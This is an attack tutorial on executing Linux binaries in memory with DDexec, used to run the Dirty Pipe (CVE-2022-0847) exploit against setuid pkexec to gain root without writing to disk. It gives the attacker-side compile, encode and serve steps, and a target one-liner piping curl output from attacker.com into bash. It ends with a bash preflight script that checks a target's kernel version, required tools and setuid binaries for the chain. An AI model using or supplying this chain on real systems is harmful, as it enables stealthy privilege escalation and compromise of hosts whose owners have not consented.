A technique for running binaries on Linux filelessly and stealthily, without touching the disk.
Executing Linux Binaries Without Touching Disk
Limitations
This attack depends on the following tools being present on the target (DDexec is a shell script and shells out to them):
dd
bash, zsh, or ash (busybox)
setarch or linux64 (busybox)
head
tail
cut
grep
od
readlink
wc
tr
base64
sleep
Example: running the Dirty Pipe (CVE-2022-0847) exploit in memory, without touching the disk, to gain root privileges.
The Dirty Pipe exploit needs a setuid root binary to overwrite; we use /usr/bin/pkexec, which is setuid root on most distributions, to escalate privileges.
On the attacker machine:
# Download exploit-2.c and compile it
https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits/blob/main/exploit-2.c
gcc exploit-2.c -o dp-setuid
# Base64-encode dp-setuid (-w0: no line wrapping, the form ddexec.sh reads on stdin)
base64 -w0 ./dp-setuid > dp-setuid.b64
# Download DDexec (ddexec.sh)
https://github.com/arget13/DDexec
# Serve dp-setuid.b64 and ddexec.sh over HTTP
python3 -m http.server 80
On the target machine:
# Fetch the base64 payload and pipe it into ddexec.sh. The arguments after ddexec.sh become the argv of the in-memory binary:
# /bin/randomename is argv[0] (the name the process shows), /usr/bin/pkexec is argv[1], the setuid binary exploit-2 targets.
# The <( ) process substitution needs bash, not sh.
curl attacker.com/dp-setuid.b64 | bash <(curl attacker.com/ddexec.sh) /bin/randomename /usr/bin/pkexec
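Before firing the one-liner it is worth confirming that the target actually meets the chain's requirements: the tools DDexec shells out to, a kernel in the Dirty Pipe window, and a setuid binary for exploit-2 to abuse. The script below is an added example, not code from DDexec or the exploit repository; the function names are mine, and the version window (bug present since 5.8, fixed upstream in 5.16.11, 5.15.25 and 5.10.102) is the upstream stable series, so on a distribution kernel treat that result as a hint only, since fixes get backported without a version bump.

```shell
#!/usr/bin/env bash
# Preflight for the DDexec + Dirty Pipe chain. Added example, not part of DDexec or the
# exploit repository; helper names are mine. Run it on the target before the one-liner.

# Print the tools from the argument list that are not in PATH; return 1 if any is missing.
# Usage: tools_missing dd head tail cut grep od readlink wc tr base64 sleep
tools_missing() {
    missing=""
    for t in "$@"; do
        command -v "$t" >/dev/null 2>&1 || missing="$missing $t"
    done
    echo "${missing# }"
    [ -z "$missing" ]
}

# Return 0 if at least one of the given alternatives is in PATH (bash|zsh|ash, setarch|linux64).
any_of() {
    for t in "$@"; do
        command -v "$t" >/dev/null 2>&1 && return 0
    done
    return 1
}

# Return 0 if a kernel version string ("5.10.100", "5.10.0-18-amd64") falls in the
# Dirty Pipe window: bug present since 5.8, fixed upstream in 5.16.11, 5.15.25 and 5.10.102.
# Only a hint: distributions backport the fix without bumping the version number.
kernel_in_dirtypipe_window() {
    v="${1%%-*}"                     # drop "-18-amd64"-style suffixes
    maj="${v%%.*}"; rest="${v#*.}"
    min="${rest%%.*}"; pat="${rest#*.}"
    [ "$pat" = "$rest" ] && pat=0    # "5.10" has no patch level
    [ "$maj" -eq 5 ] 2>/dev/null || return 1
    [ "$min" -ge 8 ] 2>/dev/null || return 1
    case "$min" in
        10) [ "$pat" -lt 102 ] ;;
        15) [ "$pat" -lt 25 ] ;;
        16) [ "$pat" -lt 11 ] ;;
        *)  [ "$min" -lt 16 ] ;;     # 5.8, 5.9, 5.11-5.14 all affected; 5.17+ shipped fixed
    esac
}

# Return 0 if the file exists and carries the setuid bit (what exploit-2 needs in its target).
is_setuid() {
    [ -f "$1" ] && [ -u "$1" ]
}

# Summarise the checks for this host against a candidate setuid target; always returns 0.
preflight_report() {
    target="${1:-/usr/bin/pkexec}"
    if kernel_in_dirtypipe_window "$(uname -r)"; then
        echo "kernel $(uname -r): in Dirty Pipe window (verify: fixes are backported)"
    else
        echo "kernel $(uname -r): outside Dirty Pipe window"
    fi
    any_of bash zsh ash    && echo "shell: ok"   || echo "shell: none of bash/zsh/ash found"
    any_of setarch linux64 && echo "setarch: ok" || echo "setarch: neither setarch nor linux64 found"
    m=$(tools_missing dd head tail cut grep od readlink wc tr base64 sleep)
    [ -z "$m" ] && echo "tools: ok" || echo "tools missing: $m"
    is_setuid "$target" && echo "$target: setuid" || echo "$target: not setuid or absent"
    return 0
}

preflight_report "$@"
```

Run it as `bash preflight.sh /usr/bin/pkexec` (or with another candidate setuid binary). A clean report only says the preconditions hold; whether the shell may write its own /proc/self/mem, the trick DDexec relies on, still has to be tried on the box.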